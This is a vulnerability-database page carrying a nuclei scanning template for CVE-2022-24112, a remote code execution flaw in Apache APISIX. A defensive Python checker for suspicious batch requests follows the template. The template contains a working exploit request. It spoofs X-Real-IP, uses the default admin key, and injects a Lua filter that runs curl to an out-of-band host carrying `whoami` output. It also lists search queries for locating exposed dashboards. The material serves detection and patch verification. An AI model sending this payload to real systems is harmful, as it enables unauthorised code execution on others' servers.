Apache APISIX - Remote Code Execution

03 Jul 2026 13:39:16 | Reported by ProjectDiscovery | Type: nuclei | github.com | 54 Views

Apache APISIX Remote Code Execution vulnerability

Code
id: CVE-2022-24112

info:
  name: Apache APISIX - Remote Code Execution
  author: Mr-xn
  severity: critical
  description: A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: Upgrade to 2.10.4 or 2.12.1. Or, explicitly configure the enabled plugins in `conf/config.yaml` and ensure `batch-requests` is disabled. (Or just comment out `batch-requests` in `conf/config-default.yaml`).
  reference:
    - https://www.openwall.com/lists/oss-security/2022/02/11/3
    - https://twitter.com/sirifu4k1/status/1496043663704858625
    - https://apisix.apache.org/zh/docs/apisix/plugins/batch-requests
    - https://nvd.nist.gov/vuln/detail/CVE-2022-24112
    - http://www.openwall.com/lists/oss-security/2022/02/11/3
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-24112
    cwe-id: CWE-290
    epss-score: 0.96182
    epss-percentile: 0.9987
    cpe: cpe:2.3:a:apache:apisix:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: apache
    product: apisix
    shodan-query:
      - title:"Apache APISIX Dashboard"
      - http.title:"apache apisix dashboard"
    fofa-query:
      - title="Apache APISIX Dashboard"
      - title="apache apisix dashboard"
    google-query: intitle:"apache apisix dashboard"
  tags: cve,cve2022,apache,rce,apisix,oast,kev,intrusive,vkev,vuln

http:
  - raw:
      - |
        POST /apisix/batch-requests HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9

        {
          "headers":{
            "X-Real-IP":"127.0.0.1",
            "Content-Type":"application/json"
          },
          "timeout":1500,
          "pipeline":[
            {
              "method":"PUT",
              "path":"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1",
              "body":"{\r\n \"name\": \"test\", \"method\": [\"GET\"],\r\n \"uri\": \"/api/{{randstr}}\",\r\n \"upstream\":{\"type\":\"roundrobin\",\"nodes\":{\"httpbin.org:80\":1}}\r\n,\r\n\"filter_func\": \"function(vars) os.execute('curl {{interactsh-url}}/`whoami`'); return true end\"}"
            }
          ]
        }
      - |
        GET /api/{{randstr}} HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9

    matchers-condition: and
    matchers:
      - type: word
        part: body_1
        words:
          - '"reason":"OK"'
          - '"status":200'
        condition: and

      - type: word
        part: interactsh_protocol
        words:
          - http

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        group: 1
        regex:
          - GET \/([a-z-]+) HTTP
        part: interactsh_request
# digest: 4a0a00473045022037c63f1eae883e4e4e90ddf7d03afd2d146aca85c10e3fa9d633dd9434ee356d022100db2c0fc6a6d7e6215a7a854df47960e36f71663716ec559cfcaa213624a1c8f6:922c64590222798bb761d5b6d8e72950
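The bypass this template exercises is a batch-requests body that sets a client IP override header and pipelines a call into the Admin API using the default admin key. As an added example (not part of the template and not APISIX code), the following hypothetical review helper in Python flags those traits in a captured request body; the two sample bodies are constructed for illustration.

```python
import json
import re
from typing import List

# Admin key shipped in APISIX's default configuration (the value this template uses).
DEFAULT_ADMIN_KEY = "edd1c9f034335f136f87ad84b625c8f1"
# Top-level headers a batch-requests caller may use to influence the client IP seen downstream.
IP_OVERRIDE_HEADERS = {"x-real-ip", "x-forwarded-for"}
ADMIN_PATH = re.compile(r"^/apisix/admin(?:/|$)")


def audit_batch_request(body: str) -> List[str]:
    """Return the reasons a /apisix/batch-requests body looks like an Admin API bypass.

    Empty list means nothing suspicious; the caller decides whether to block, alert or log.
    """
    findings: List[str] = []
    try:
        req = json.loads(body)
    except json.JSONDecodeError:
        return ["body is not valid JSON"]
    if not isinstance(req, dict):
        return ["body is not a JSON object"]

    # Top-level headers are applied to every pipelined sub-request.
    headers = {str(k).lower(): v for k, v in (req.get("headers") or {}).items()}
    for name in sorted(set(headers) & IP_OVERRIDE_HEADERS):
        findings.append(f"client IP override via {name}={headers[name]}")

    for i, call in enumerate(req.get("pipeline") or []):
        if not isinstance(call, dict):
            continue
        path = str(call.get("path", ""))
        if ADMIN_PATH.match(path):
            findings.append(f"pipeline[{i}] targets the Admin API: {path.split('?')[0]}")
        call_headers = {str(k).lower(): str(v) for k, v in (call.get("headers") or {}).items()}
        if DEFAULT_ADMIN_KEY in path or DEFAULT_ADMIN_KEY in call_headers.values():
            findings.append(f"pipeline[{i}] presents the default admin key")
    return findings


# Constructed sample bodies: an ordinary batch call and one shaped like this template's request.
BENIGN_BODY = json.dumps({"timeout": 1500, "pipeline": [{"method": "GET", "path": "/api/orders"}]})
SUSPICIOUS_BODY = json.dumps({
    "headers": {"X-Real-IP": "127.0.0.1", "Content-Type": "application/json"},
    "timeout": 1500,
    "pipeline": [{"method": "PUT", "path": "/apisix/admin/routes/index?api_key=" + DEFAULT_ADMIN_KEY}],
})

if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("suspicious", SUSPICIOUS_BODY)):
        print(label, audit_batch_request(body) or ["clean"])
```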


Scores (as of 04 Feb 2026 07:00): Vulners AI Score 7.7 (High risk); CVSS 2: 7.5; CVSS 3.1: 9.8; EPSS: 0.96182